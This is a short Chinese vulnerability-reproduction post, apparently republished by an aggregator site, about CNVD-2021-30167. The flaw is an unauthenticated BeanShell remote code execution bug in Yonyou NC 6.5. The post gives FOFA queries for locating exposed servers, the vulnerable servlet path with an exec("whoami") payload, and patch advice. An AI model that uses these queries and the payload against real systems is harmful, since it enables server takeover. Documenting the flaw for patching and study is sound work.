CNVD-2021-30167用友NC BeanShell 漏洞复现(CNVD-2021-30167)

Posted 星球守护者

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CNVD-2021-30167用友NC BeanShell 漏洞复现(CNVD-2021-30167)相关的知识,希望对你有一定的参考价值。

文章目录

漏洞名称

  • 用友NC BeanShell远程代码执行漏洞

漏洞介绍

  • 用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。
  • 2021年6月2日,用友公司发布了关于用友NC BeanShell远程代码执行漏洞的风险通告。

漏洞编号

  • CNVD-2021-30167

漏洞描述

  • 由于用友NC对外开放了BeanShell的测试接口未经身份验证的攻击者利用该测试接口,
  • 通过向目标服务器发送恶意构造的Http请求,在目标系统上直接执行任意代码,从而获得目标服务器权限。

影响版本

  • 用友NC6.5版本

FOFA

title=="YONYOU NC"
app="用友-UFIDA-NC"

漏洞点

http://ip/servlet/~ic/bsh.servlet.BshServlet
exec("whoami");

漏洞复现

https://1x.1x.xx.xx:8443/servlet/~ic/bsh.servlet.BshServlet


修复建议

由于该漏洞的出现是因第三方jar包的漏洞导致,用友NC官方已发布相关的安全补丁,使用该产品的用户需要及时安装该漏洞补丁包

补丁地址:

http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

摘抄

大雨中为你撑伞的人,黑暗中默默抱紧你的人,

逗你笑的人,陪你彻夜聊天的人,

坐车来看你的人,在医院陪你的人,

陪你哭过的人,总是以你为重的人,

是这些温暖使你成为善良的人。

以上是关于CNVD-2021-30167用友NC BeanShell 漏洞复现(CNVD-2021-30167)的主要内容,如果未能解决你的问题,请参考以下文章

用友NC6.5 BeanShell远程代码执行漏洞复现(CNVD-2021-30167)

用友NC6.5 BeanShell远程代码执行漏洞复现(CNVD-2021-30167)

用友NC BeanShell_未授权RCE

用友nc65怎么做采购订单退货

用友OA/NC/NCCloud安全漏洞检测以及RCE复现渗透测试

用友ERP-nc保存的时候提示保存VO数组失败,详细请看日志是啥意思